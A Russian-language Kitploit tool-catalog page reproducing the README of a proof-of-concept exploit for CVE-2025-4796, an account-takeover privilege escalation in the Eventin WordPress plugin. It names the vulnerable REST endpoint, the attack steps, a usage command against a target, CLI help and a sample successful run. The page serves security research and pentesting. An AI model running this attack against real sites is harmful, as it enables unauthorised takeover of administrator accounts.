Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-4796 — Eventin <= 4.0.34 — повышение привилегий аутентифицированных пользователей (Contributor+) через смену email пользователя/захват аккаунта | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2025-4796
Аутентификация и авторизацияПовышение привилегийАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийОбучение и Образование
GitHubnxploited/cve-2025-4796

CVE-2025-4796

Eventin <= 4.0.34 — повышение привилегий аутентифицированных пользователей (Contributor+) через смену email пользователя/захват аккаунта

Репозиторий
9 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-4796

Eventin <= 4.0.34 - Повышение привилегий для аутентифицированных пользователей (Contributor+) через смену email пользователя / захват учётной записи

🛡️ Eventin <= 4.0.34 - Повышение привилегий для аутентифицированных пользователей (Contributor+) (CVE-2025-4796)

📌 Обзор

В этом репозитории документируется уязвимость повышения привилегий в плагине Eventin для WordPress (<= 4.0.34), которая позволяет аутентифицированному пользователю с правами Contributor+ изменять адреса электронной почты произвольных пользователей через API обновления спикеров плагина. Изменив email администратора, злоумышленник может инициировать сброс пароля и получить полный контроль над учётной записью.

  • Уязвимый компонент: плагин Eventin для WordPress (Eventin\Speaker\Api\SpeakerController::update_item)

  • Затронутые версии: <= 4.0.34

  • CVE: CVE-2025-4796

  • CVSS: 8.8 (Высокий)

  • Активных установок: 10,000+

⚠️ Детали уязвимости

Eventin не выполняет надлежащую проверку личности или прав вызывающей стороны перед обновлением данных спикера/пользователя (в частности, email). Злоумышленник, аутентифицированный как contributor (или выше), может изменить адрес электронной почты других пользователей — включая администраторов — с помощью REST-эндпоинта плагина:

  • PUT /wp-json/eventin/v2/speakers/<speaker_id>

После изменения email на адрес, контролируемый злоумышленником, стандартный механизм сброса пароля WordPress может быть использован для захвата учётной записи.

🧰 Скрипт (PoC)

Имя файла: CVE-2025-4796.py

Этот скрипт автоматизирует следующие шаги:

  1. Вход на целевой сайт WordPress с использованием переданных учётных данных.
  2. Извлечение необходимого X-WP-Nonce.
  3. Отправка PUT-запроса на /wp-json/eventin/v2/speakers/<speaker_id> для обновления email спикера.
  4. Вывод и форматирование JSON-ответа и профессионального сообщения об успехе.

Требования:

  • Python 3.8+
  • requests

Установка:

root@kitploit:~
pip install requests

🚀 Использование

Запустите скрипт из командной строки:

root@kitploit:~
python CVE-2025-4796.py -u https://target.site -id 9 -email [email protected] -user contributor_user -pass contributor_password

Показать справку скрипта:

root@kitploit:~
python CVE-2025-4796.py -h

📝 Параметры CLI (справка)

root@kitploit:~
usage: CVE-2025-4796.py [-h] -u URL -id SPEAKER_ID -email EMAIL -user USERNAME -pass PASSWORD

Exploit For: CVE-2025-4796 By: Nxploited

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress site URL
  -id, --speaker_id SPEAKER_ID
                        Enter the speaker ID for the user
  -email, --email EMAIL
                        Enter a new email address
  -user, --username USERNAME
                        Enter the username for the account to upgrade
  -pass, --password PASSWORD
                        Enter the password for the account to upgrade


✅ Пример успешного вывода

root@kitploit:~
[*] Please wait, exploitation starting ...
[*] Disabling SSL warnings ...
[*] Logging in to WordPress ...
[+] Logged in successfully.
[*] Extracting nonce value ...
[+] Nonce extracted: fc0ab7b983
[*] Exploiting and updating speaker info ...

[+] Exploitation in progress, please wait ...

[+] Exploitation successful.
[+] The account has been updated to Admin.
    Speaker ID   : 9
    Email        : [email protected]

[!] Please reset your password using the email: [email protected]

⚖️ Ответственное раскрытие и отказ от ответственности

  • Этот репозиторий предоставлен для исследований в области безопасности, тестирования и защитных целей.
  • Не используйте эти методы против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения.
  • Несанкционированная эксплуатация уязвимостей незаконна и неэтична.
  • Если вы владелец сайта и считаете, что ваша система уязвима, немедленно обновите Eventin до последней версии или примените исправления от вендора.
  • Используйте этот код только в авторизованных средах (лаборатория, пентест, одобренный клиентом, или с явного разрешения).

🧾 Что делает скрипт (кратко)

  • Проверяет входные данные (URL, email) и нормализует схему URL.
  • Отключает предупреждения SSL (необязательно; используется для поддержки тестирования dev-экземпляров с самоподписанными сертификатами).
  • Выполняет вход с использованием переданных учётных данных WordPress и проверяет вход через cookies.
  • Получает X-WP-Nonce со страницы администрирования.
  • Отправляет аутентифицированный PUT-запрос для обновления email спикера.
  • Выводит отформатированный JSON-ответ и итоговую сводку об успехе в читаемом виде.

👤 Авторы

Автор: Khaled Alenaz (Nxploited)
GitHub: https://github.com/Nxploited/

Скачать инструмент